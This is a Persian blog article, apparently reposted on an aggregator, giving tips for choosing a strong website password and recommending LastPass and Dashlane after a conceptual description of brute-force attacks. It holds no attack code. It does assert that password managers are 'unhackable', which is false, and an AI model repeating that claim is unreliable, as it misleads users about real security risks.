نوشته افزونه فوق امنیتی وردپرس Security Pro نسخه ۵٫۵٫۶ اولین بار در دلکد – دانلود اسکریپت. پدیدار شد.



لینک منبع مطلب

چگونه یک رمز عبور ایمن برای وبسایت خود انتخاب کنید؟

آیا تا به حال پیش آمده که زمان ایجاد یک حساب کاربری جدید، در انتخاب رمز عبور، درمانده شده باشید؟
تنها راهی که حساب کاربری شما را در مقابل افراد دیگر و هکرها محفوظ نگه می­‌دارد، همین رمز عبور شماست. پس باید با دقت زیاد رمز عبور ایمن را انتخاب کنید. در خصوص وبسایت نیز انتخاب رمز عبور اهمیت زیادی دارد. چون رمز عبور تنها راهی است که مانع از دسترسی دیگران و سواستفاده آن­ها از سایت شما می­‌شود. هکرها، همواره در حال یادگیری روش‌­های جدید برای شکستن رمز عبور هستند، تا حساب­‌های شما را به خطر بیاندازند.

 

رمز عبور ایمن

بنابراین با توجه به اهمیت زیاد انتخاب رمز عبور، در این مقاله نکاتی را که در انتخاب رمز عبور ایمن باید رعایت کنید را بیان می­‌کنیم. البته بخاطر داشتن رمز عبور نیز خود مقوله مهمی است؛ چون به خاطر داشتن تنها یک رمز عبور، کار سختی است… چه برسد به اینکه بخواهیم، رمزهای عبور مربوط به حساب­‌های مختلف خود را در ذهن داشته باشیم. برای حل این مسئله نیز به شما نرم­افزارهایی را پیشنهاد خواهیم کرد.

 

حمله جستجوی فراگیر (Brute Force) و دسترسی هکر به رمز عبور شما

حمله جستجوی فراگیر ،حمله‌­ای است که هکر تلاش می­‌کند، با آزمون و خطا، نام کاربری و رمز عبور سیستم را حدس بزند. این نوع حمله برای سیستم­‌های مدیریت محتوا مانند وردپرس و جوملا، بسیار شایع است.

 

حدس زدن رمز عبور و نام کاربری در حمله جستجوی فراگیر، توسط ربات‌­ها انجام می‌­شود. آن­‌ها به طور مداوم تلاش می­‌کنند تا به کمک رایج‌­ترین رمزهای عبور، رمز سیستم شما را حدس بزنند تا وارد سیستم شوند. این ربات­‌ها بسیار بی­‌رحم هستند و تا زمانی که رمز عبور را حدس نزنند، دست از تلاش بر نمی­‌دارند. هر چه رمز عبور شما سخت­‌تر باشد، ربات­‌ها با احتمال کمتری به حساب­‌های شخصی شما دسترسی پیدا خواهند کرد.

 

اگر سایت شما هک شود، باید با رتبه سئو و اعتبار سایت خود خداحافظی کنید. سایت بعد از هک شدن، ممکن است از بدافزارها پر شود و به صورت خودکار به تمام بازدید کنندگان وبسایت شما ایمیل اسپم ارسال کند! بنابراین اگر می‌­خواهید، سایت شما در مقابل این ربات­‌ها ایمن باشد، باید یک رمز عبور قوی انتخاب کنید.

 

۱- قابل پیش‌بینی بودن رمز عبور

درست است که بخاطر سپردن رمزهای عبور مانند ۱۲۳ یا ۱۲۳۴۵۶ بسیار راحت است، اما این رمزها یا هر ترکیبی از اعداد یا حروف متوالی به آسانی قابل حدس زدن هستند. همچنین انتخاب تاریخ تولد یا نام شما به عنوان رمز عبور، کار هوشمندانه‌­ای نیست! زیرا این اطلاعات بدون تلاش زیاد برای هر شخصی قابل دسترسی هستند.

 

۲- طول رمز عبور

هر چه رمز عبور طولانی‌­تر باشد، مناسب‌­تر است. هر چه از کارکترهای بیشتری در رمز خود استفاده کنید، احتمال حدس زدنش کمتر خواهد شد. پس کارکترهای بیشتر یعنی رمز عبور مطمئن‌­تر…

 

۳- پیچیدگی رمز عبور

زمانی‌که رمز عبوری انتخاب کردید، با اضافه کردن اعداد، کاراکترهای خاص و مخلوطی از حروف بزرگ و کوچک در بین حروف آن، رمز را پیچیده کنید تا حدس زدن آن بسیار سخت­تر شود. برای مثال فرض کنید، اسم hary را برای رمز عبور خود انتخاب کرده­‌اید… اکنون نام اصلی را با اضافه کردن اعداد و کارکترها، مبهم کنید؛ مثلاً H4R&r*Y@.

 

۴- جدید بودن رمز عبور

هیچگاه از رمزی که مربوط به حساب دیگرتان است، استفاده نکنید. زیرا در غیر این صورت، اگر حسابتان هک شد، حساب­‌های دیگر هم در معرض خطر خواهند بود. در این شرایط ممکن است نه تنها وبسایت شما، بلکه زندگی شخصی­تان آسیب ببیند.

 

چگونه رمز عبورتان را فراموش نکنید؟

اگر برای شما به خاطر سپردن رمزهای عبور متفاوت و حساب‌­های مختلف کار سختی است، به شما نرم‌افزارهای مدیریت پسورد را پیشنهاد می‌­کنیم. با کمک این نرم‌افزارها قادر خواهید بود، رمز عبور ایمن انتخاب کنید و نگران فراموش کردن رمزها نباشید.

 

این برنامه‌ها به‌ صورت افزونه بر روی مرورگرتان قرار خواهند گرفت و پس از اینکه برای اولین بار به هر حسابی وارد شدید، رمز عبورتان را ذخیره می‌­کنند و دیگر نیاز نیست که رمزهای مختلف را به خاطر بسپارید. پسورد منیجرها، نرم­‌افزارهایی ایمن و غیر قابل هک هستند که از سیستم رمزگذاری End-to-End بهره می­‌برند. این نرم‌­افزارها همچنین به شما در انتخاب رمزهای پیچیده و طولانی کمک می­‌کنند. در ادامه دو مورد از رایج‌­ترین نرم‌­افزارهای مدیریت رمز عبور را معرفی می‏‌کنیم.

 

چگونه یک رمز عبور ایمن برای وبسایت خود انتخاب کنید؟

LastPass یکی از محبوب­‌ترین پسورد منیجرها است. این نرم‌‏افزار رمز عبور را ذخیره­ می­‌کند. همچنین رمز عبور ایمن به شما پیشنهاد می­‌دهد و اگر حسابتان هک شود، به صورت خودکار رمز عبورتان را تغییر می­‌دهد.

 

چگونه یک رمز عبور ایمن برای وبسایت خود انتخاب کنید؟

 

Dashlane نرم‌­افزار دیگری است که علاوه بر امنیت بالا، امکان تغییر همزمان رمز عبور حساب‏‌های مختلف را ممکن می­‌کند و در صورت هک شدن حسابتان به شما اطلاع خواهد داد تا با استفاده از قابلیت تغییر سریع رمز عبور، رمزهایتان را تغییر دهید.

 

نتیجه‌گیری

در انتخاب رمز عبور ایمن، به این نکات دقت داشته باشید تا وبسایت خود را در مقابل هکرها ایمن کنید.
هکرها برای هک کردن سایت­‌های شما، ابزارهای زیادی دارند. پس با انتخاب رمزهای عبور  قوی و پیچیده کارشان را سخت­‌تر کنید! این خود اولین قدم برای حفظ امنیت وبسایت است پس آن را جدی بگیرید.

نوشته چگونه یک رمز عبور ایمن برای وبسایت خود انتخاب کنید؟ اولین بار در بیست اسکریپت. پدیدار شد.



لینک منبع مطلب

صفحه 1 از 4
1234 بعدی